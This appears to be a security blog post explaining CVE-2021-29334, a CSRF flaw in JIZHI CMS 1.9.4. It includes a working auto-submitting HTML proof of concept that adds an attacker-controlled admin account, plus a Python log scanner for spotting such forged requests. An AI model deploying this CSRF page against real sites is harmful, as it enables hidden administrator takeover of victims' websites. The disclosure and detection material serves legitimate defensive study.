In today's post, we will discuss the recently found vulnerability in JIZHI CMS 1.9.4, which has been assigned the CVE ID of CVE-2021-29334. This vulnerability comes in the form of a CSRF (Cross-Site Request Forgery) attack that can be exploited by an attacker to add an administrative account to a JIZHI CMS 1.9.4 installation without the original admin's knowledge or consent. We will take you through the details of this vulnerability, discuss its impact, provide a code snippet to demonstrate how it can be exploited, and link to original references for further information.

Background

JIZHI CMS is a popular content management system (CMS) that allows users to easily manage their websites, blogs, and web-based applications. The latest version of this software, JIZHI CMS 1.9.4, contains a critical security vulnerability known as CVE-2021-29334. This vulnerability, discovered by security researchers, takes advantage of the application's inadequate protection against CSRF attacks.

Exploit Details

To better understand how this vulnerability can be exploited, let us first look at what a CSRF attack is. Cross-Site Request Forgery (CSRF) is a type of attack that occurs when a malicious website or application causes an authenticated user to perform unwanted actions on a web application in which they're currently authenticated. This can be dangerous, as it may allow the attacker to perform actions using the victim's credentials and permissions.

In the case of CVE-2021-29334, an attacker could exploit the vulnerability by convincing a user who has administrative access to the JIZHI CMS installation to visit a malicious website or click on a specially crafted link. The attacker could then use this vulnerability to add a new admin account to the victim's JIZHI CMS installation without their knowledge or consent.

Here's a code snippet that demonstrates how an attack exploiting this vulnerability could be crafted:

<!DOCTYPE html>
<html>
    <body>
        <form action="https://[TARGET_JIZHI_CMS_URL]/admin.php/Admin/adminadd.html" method="POST" enctype="multipart/form-data" id="csrf_form">
            <input type="hidden" name="username" value="malicious_admin" />
            <input type="hidden" name="password" value="malicious_password" />
            <input type="hidden" name="password_confirm" value="malicious_password" />
            <input type="hidden" name="email" value="malicious@email.com" />
        </form>
        <script>
            document.getElementById("csrf_form").submit();
        </script>
    </body>
</html>

In this code snippet, the attacker creates a fake form with the necessary fields to add a new admin account to the JIZHI CMS installation. The form's action is set to the target URL, and JavaScript is used to automatically submit the form when the HTML page is loaded. If the user with administrative access visits this web page, their logged-in session would be used to create an admin account controlled by the attacker.
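
On the defender's side, a forged submission like this shows up in the web server's access log as a POST to the admin-add path whose Referer is off-site or missing. The following Python sketch is an added example, not code from the original references or from the JIZHI CMS project; it assumes the Apache/nginx combined log format, and the host name cms.example.test and the sample log lines are constructed for illustration:

```python
import re
from urllib.parse import urlsplit

# Path taken from the form action in the snippet above.
ADMIN_ADD_PATH = "/admin.php/Admin/adminadd.html"

# Apache/nginx "combined" access log format (an assumption about the server).
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "[^"]*"'
)

def classify(line, site_host):
    """Return None for unrelated lines, else 'same-site', 'cross-site' or 'no-referer'."""
    m = LINE_RE.match(line)
    if not m or m["method"] != "POST":
        return None
    if urlsplit(m["target"]).path != ADMIN_ADD_PATH:
        return None
    referer = m["referer"]
    if referer in ("", "-"):
        # Stripped by Referrer-Policy or sent by a non-browser client: cannot be cleared.
        return "no-referer"
    try:
        host = (urlsplit(referer).hostname or "").lower()
    except ValueError:  # malformed Referer value
        host = ""
    return "same-site" if host == site_host.lower() else "cross-site"

def suspicious_admin_adds(lines, site_host):
    """Return (verdict, log line) pairs for admin-add POSTs that need review."""
    verdicts = ((classify(line, site_host), line) for line in lines)
    return [(v, line) for v, line in verdicts if v in ("cross-site", "no-referer")]

# Constructed sample lines; cms.example.test stands in for the CMS host.
_POST = '"POST /admin.php/Admin/adminadd.html HTTP/1.1" 200 498'
SAMPLE_LOG = [
    f'198.51.100.10 - - [23/Nov/2022:10:01:12 +0000] {_POST} "https://cms.example.test/admin.php" "Mozilla/5.0"',
    f'198.51.100.10 - - [23/Nov/2022:10:07:45 +0000] {_POST} "https://lure.example.net/page.html" "Mozilla/5.0"',
    f'198.51.100.10 - - [23/Nov/2022:10:09:03 +0000] {_POST} "-" "Mozilla/5.0"',
    '198.51.100.22 - - [23/Nov/2022:10:10:00 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for verdict, line in suspicious_admin_adds(SAMPLE_LOG, "cms.example.test"):
        print(verdict, line)
```

A same-site Referer only rules out the clearest cross-site cases, so any flagged entry should be compared against the list of admin accounts that actually exist in the installation.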

Original References

If you'd like to dig deeper into this vulnerability and its details, you can refer to the following original references:

- Exploit Database

Conclusion

CVE-2021-29334 is a serious vulnerability that could have significant consequences if left undiscovered and unpatched. If you are using JIZHI CMS 1.9.4, it's essential to apply any available security patches or temporarily implement other security measures to protect your application from CSRF attacks.

Make sure to keep an eye on your JIZHI CMS installation and always stay up to date on the latest security news and updates to protect your website from potential threats.

Timeline

Published on: 11/23/2022 20:15:00 UTC
Last modified on: 11/28/2022 19:39:00 UTC